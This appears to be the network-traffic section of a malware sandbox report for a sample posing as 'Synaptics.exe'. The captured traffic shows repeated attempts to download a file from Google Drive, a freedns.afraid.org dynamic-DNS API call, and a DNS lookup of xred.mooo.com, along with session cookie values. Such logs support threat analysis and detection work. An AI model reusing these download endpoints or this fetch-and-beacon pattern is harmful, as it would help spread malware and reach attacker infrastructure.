                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                              Source: global trafficDNS traffic detected: DNS query: docs.google.com
                              Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                              Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6NJWRzAGzN6dk7Rk4Q0QhRvXdxRVKEpMmWNU-TskVxm1TNk1I3X8D7u4p65YTUVeg4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:25 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-CTKQS5mfjll2Jmlgd_8V5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=GG50B5bNv6sgXACql__W2PXcKZPl7tvWh7yCyN5O4G1FTVXRl9DITtg7F0NDTb1C9t5S152i_ICLfAe1H2fxnTJ8JrEDVAVRPZae_sL_6AH5SaTjnPk2h4AqLCoE5njkS2pPKExFaP_qi_kRcBh1BP4swSFF2VSB0u2jDSWnNsXH-zRVFWAAOxkC; expires=Tue, 01-Jul-2025 10:25:25 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC77wJA2R2cStc_feaZHAIIPpMzFvKXA5mkmJbpAdI4OZeVgzn1zN1VpvzJHxiJFUfw4CTvfvaEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:26 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-jlf0ta-mYkkCMI-P_n4i7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4; expires=Tue, 01-Jul-2025 10:25:26 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Rk7x6G9Cw79s4CKlRE7KeTlU1mqjjlKVB72oI9FBzAvSObvqiSz5RxvXlvdwPj7jLContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:27 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ItDEC91G38a8pGYrGg3IJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=qGDJMLG_t58BS-V2j56tFICrxKsP-s96iV7zJACl0Iwax3pxWGUggnrNtuf7_7rv6xKv31XKe5BeOmnFq96EZD-EkZIVIIpKZY2kJ2SB4_RuWaQWV_SxzywN-Dnl34h_aNSkS9Dyy0XyTdvfDmqVKjIRELt2S9Yfib9Oe9wU6ha3OHDAqdrsl_PK; expires=Tue, 01-Jul-2025 10:25:27 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5wi2I7y0K9mY2txpBIIWgKBlThL8-oIBVE46o-CJc5PxteDjP4RoCpMG0c-3-cIMshNtURuCYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:27 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-2K36qYj9mli-atvxMVYbWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg; expires=Tue, 01-Jul-2025 10:25:27 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7mbSrGnnhmMv9UmZKzzX2QNDs66DM-0IwkqRgw0upMps9THjGlZTjTws1YRYEYzV0PLDp4bqEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:28 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-AarvdY-B9VdsfJLqR_57pw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC78WH2aQ4H0haM8uSur0MTXrEhLMcknkFGY4awX1-JEYYWodeMjpOk3e8ngSJPmgD0OContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:29 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-1hJselt7JyWs-IlT9xc4IA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC67ZWE3HbwZYYqmy-HkpddXX9XWeXrshRkh9nu22j3_7I_JBJyIlOpc6eiiSQQEpnGpCRfOFjsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:30 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-5uNVTAlXcFdEHk_x6A0qrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
